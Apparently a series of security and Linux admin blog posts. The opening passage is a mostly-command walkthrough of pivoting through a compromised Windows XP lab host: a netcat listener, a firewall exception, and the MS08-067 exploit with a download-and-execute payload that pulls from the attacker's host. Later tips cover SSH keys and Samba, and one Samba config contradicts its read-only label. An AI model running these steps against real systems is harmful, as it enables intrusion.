meterpreter > execute -H -f cmd.exe -c -i Process 256 created. Channel 9 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\user\Desktop>cd %temp% cd %temp% C:\DOCUME~1\user\LOCALS~1\Temp>dir dir Volume in drive C has no label. Volume Serial Number is 080D-40BD Directory of C:\DOCUME~1\user\LOCALS~1\Temp 12/05/2010 01:57 AM <DIR> . 12/05/2010 01:57 AM <DIR> .. 10/23/2009 07:30 PM 8,704 21227.mst 10/23/2009 07:30 PM 8,704 21ad2.mst 10/23/2009 07:30 PM 8,704 48f1e.mst 10/23/2009 07:30 PM 8,704 c833.mst 08/15/2009 02:54 AM 8,704 ff21.mst 12/05/2010 01:57 AM 74,144 httpresponse-msf.cfg 12/05/2010 01:57 AM 61,440 netcat.exe 10/23/2009 07:30 PM 33,709 vminst.log_20091023_193054.log 06/10/2010 11:06 AM 41,986 vminst.log_20100610_110602.log 09/24/2010 12:47 PM 45,686 vminst.log_20100924_124718.log 09/28/2010 04:41 PM 45,537 vminst.log_20100928_164134.log 11/29/2010 03:53 PM 45,537 vminst.log_20101129_155316.log 10/23/2009 07:30 PM 2,573,050 vmmsi.log_20091023_193054.log 10/23/2009 07:30 PM 2,573,050 vmmsi.log_20091023_193054_Failed.log 06/10/2010 11:06 AM 2,958,144 vmmsi.log_20100610_110601.log 09/24/2010 12:47 PM 3,008,988 vmmsi.log_20100924_124718.log 09/28/2010 04:41 PM 2,960,554 vmmsi.log_20100928_164134.log 11/29/2010 03:53 PM 2,958,778 vmmsi.log_20101129_155316.log 11/29/2010 03:54 PM <DIR> VMwareDnD 18 File(s) 17,424,123 bytes 3 Dir(s) 40,819,601,408 bytes free C:\DOCUME~1\user\LOCALS~1\Temp>start /b netcat.exe -nlvp 80 <>listening on [any] 80 ... C:\DOCUME~1\user\LOCALS~1\Temp>

Oops. Looks like somebody is interfering with our business.
The firewall on pivot machine may interfere to open a port on listening mode.
But, we got access of this machine and here is how we can add an exception in firewall...

C:\DOCUME~1\user\LOCALS~1\Temp>netsh firewall set portopening tcp 80 nc enable all netsh firewall set portopening tcp 80 nc enable all Ok. C:\DOCUME~1\user\LOCALS~1\Temp>

Ok. So now we were able to open port number 80 and enabled it for listening mode.
Alright, so let's run netcat as we had done once again.

C:\DOCUME~1\user\LOCALS~1\Temp>start /b netcat.exe -nlvp 80 <>listening on [any] 80 ... C:\DOCUME~1\user\LOCALS~1\Temp>exit exit ^C Terminate channel 9? [y/N] y meterpreter >

All set. Now set the parameters and run ms08_067 for machine B...

meterpreter > background msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > set RHOST 192.168.74.129 RHOST => 192.168.74.129 msf exploit(ms08_067_netapi) > set PAYLOAD windows/download_exec PAYLOAD => windows/download_exec msf exploit(ms08_067_netapi) > set URL http://192.168.74.128/ URL => http://192.168.74.128/ msf exploit(ms08_067_netapi) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.74.129 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/download_exec): Name Current Setting Required Description ---- --------------- -------- ----------- URL http://192.168.74.128/ yes The pre-encoded URL to the executable Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > exploit -j [*] Exploit running as background job. msf exploit(ms08_067_netapi) > [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Attempting to trigger the vulnerability... [*] 172.16.24.1:36593 Request received for /Af4IZ... [*] 172.16.24.1:36593 Staging connection for target f4IZ received... [*] Patching Target ID f4IZ into DLL [*] 172.16.24.1:45245 Request received for /Bf4IZ... [*] 172.16.24.1:45245 Stage connection for target f4IZ received... [*] Meterpreter session 2 opened (172.16.24.130:443 -> 172.16.24.1:45245) at 2010-12-04 20:57:45 +0000 msf exploit(ms08_067_netapi) >

Here we go...
As we can see, the exploit was successful and it opened meterpreter session 2 connecting back to the attacker's machine.

msf exploit(ms08_067_netapi) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 WINXP\user @ WINXP 172.16.24.130:443 -> 172.16.24.1:46715 2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ WINXP 172.16.24.130:443 -> 172.16.24.1:45245 msf exploit(ms08_067_netapi) > sessions -i 2 [*] Starting interaction with 2... meterpreter > ipconfig MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0 AMD PCNET Family PCI Ethernet Adapter #3 - Packet Scheduler Miniport Hardware MAC: 00:0c:29:7e:bd:74 IP Address : 192.168.74.129 Netmask : 255.255.255.0 meterpreter >

..............Done!!!

SSH to server without any password...

You want the access of SSH server and don't wish to enter password all the times while connecting to the server. This can be the case someone using scp very frequently to copy multiple files from server to client or vice versa.

Scenario: User a on host A(client) want to access host B(server) having SSH server(OpenSSH) running on it, with access-without-password feature. :-)

Steps:

a@ubuntu_A:~$ ssh-keygen -t rsa a@ubuntu_A:~$ ssh b@ubuntu_B mkdir -p .ssh a@ubuntu_A:~$ cat .ssh/id_rsa.pub | ssh b@ubuntu_B 'cat >> .ssh/authorized_keys2' b@ubuntu_B's password: a@ubuntu_A:~$ a@ubuntu_A:~$ ssh b@ubuntu_B Last login: Thu Nov 18 09:48:06 2010 from 192.168.1.102 b@ubuntu_B:~$

OR

Just came across this alternative...check this out:

a@ubuntu_A:~$ ssh-copy-id b@ubuntu_B b@ubuntu_B's password: a@ubuntu_A:~$ ssh b@ubuntu_B Last login: Thu Nov 18 09:48:06 2010 from 192.168.1.102 b@ubuntu_B:~$

References:
http://linuxproblem.org/art_9.html
http://www.csua.berkeley.edu/~ranga/notes/ssh_nopass.html

..............Done!!!

Install 32 bit application on 64 bit Ubuntu...

There can be requirement in many cases, when you want to install some 32 bit applications on 64 bit OS environment.
I faced this problem, when I had to install GoogleEarth for my Ubuntu Lucid Lynx 64 bit OS.

ubuntu@localhost:~$ sudo ./GoogleEarthLinux-5.1.bin [sudo] password for ubuntu: Verifying archive integrity... All good. Uncompressing Google Earth for GNU/Linux 5.1.3535.3218............................................................... setup.data/bin/Linux/amd64/setup.gtk2: error while loading shared libraries: libxml2.so.2: cannot open shared object file: No such file or directory setup.data/bin/Linux/amd64/setup.gtk: error while loading shared libraries: libSM.so.6: cannot open shared object file: No such file or directory The setup program seems to have failed on amd64 Fatal error, installer failed to run at all! ubuntu@localhost:~$

So, to achieve this, all you need to do is install ia32-libs, and we are good to go.

ubuntu@localhost:~$ sudo apt-get install ia32-libs

There are other ways though, to make 32 bit applications run on 64 bit OS.
Refer this link for more options.

..............Done!!!

[Howto] Install Origami on Ubuntu...

Origami : parser, analyzer for PDF documents.
Install ruby and required dependencies, all-in-one command...

ubuntu@localhost:~$ sudo apt-get install ruby libgtk2-ruby libopenssl-ruby libssl-dev openssl

..............Done!!!

Share folders in Ubuntu server using through CLI...

Change the samba configuration file located at /etc/samba/smb.conf as follows...
i. For authentication-based-access, append...

[private]
     comment = Private Share
     path =  /tmp/pri-share
     browseable = no
     read only = no

ii. For anonymous-read-only access

[public]
      comment = Public Share
      path = /tmp/pub-share
      read only = no
      guest only = yes
      guest ok = yes

Be sure, while accessing the shares from either windows or linux box, you are using 'private' of 'public' as share names instead 'pri-share' and 'pub-share'.

e.g. \\192.168.1.10\private
smb://192.168.1.10/private


..............Done!!!

Python tools for penetration testers...

Found this list(in a blogpost by Dirk Loss) very interesting which may help a pen-tester...
Enjoy...

http://dirk-loss.de/python-tools.htm